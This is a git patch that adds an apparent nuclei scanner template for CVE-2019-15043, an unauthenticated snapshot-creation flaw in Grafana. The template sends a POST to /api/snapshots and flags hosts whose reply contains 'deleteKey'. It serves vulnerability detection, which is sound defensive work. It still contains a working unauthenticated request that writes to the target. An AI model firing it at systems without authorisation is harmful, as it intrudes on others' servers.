From c40cd5259fd9a21d8595fe03d5aa6b89e6545b94 Mon Sep 17 00:00:00 2001
From: med pro <25457545+bing0o@users.noreply.github.com>
Date: Sat, 4 Jul 2020 14:05:56 +0100
Subject: [PATCH] Create CVE-2019-15043.yaml

---
 cves/CVE-2019-15043.yaml | 23 +++++++++++++++++++++++
 1 file changed, 23 insertions(+)
 create mode 100644 cves/CVE-2019-15043.yaml

diff --git a/cves/CVE-2019-15043.yaml b/cves/CVE-2019-15043.yaml
new file mode 100644
index 00000000000..2a4be1541c8
--- /dev/null
+++ b/cves/CVE-2019-15043.yaml
@@ -0,0 +1,23 @@
+id: CVE-2019-15043
+info:
+  author: bing0o
+  name: Grafana unauthenticated API
+  severity: medium
+requests:
+  - body: >-
+      {"dashboard":
+      {"editable":false,"hideControls":true,"nav":[{"enable":false,"type":"timepicker"}],"rows":
+      [{}],"style":"dark","tags":[],"templating":{"list":[]},"time":{},"timezone":"browser","title":"Home","version":5},"expires":
+      3600}
+    headers:
+      Content-Type: application/json
+      Host: '{{Hostname}}'
+      User-Agent: Mozilla/5.0
+    matchers:
+      - part: body
+        type: word
+        words:
+          - deleteKey
+    method: POST
+    path:
+      - '{{BaseURL}}/api/snapshots'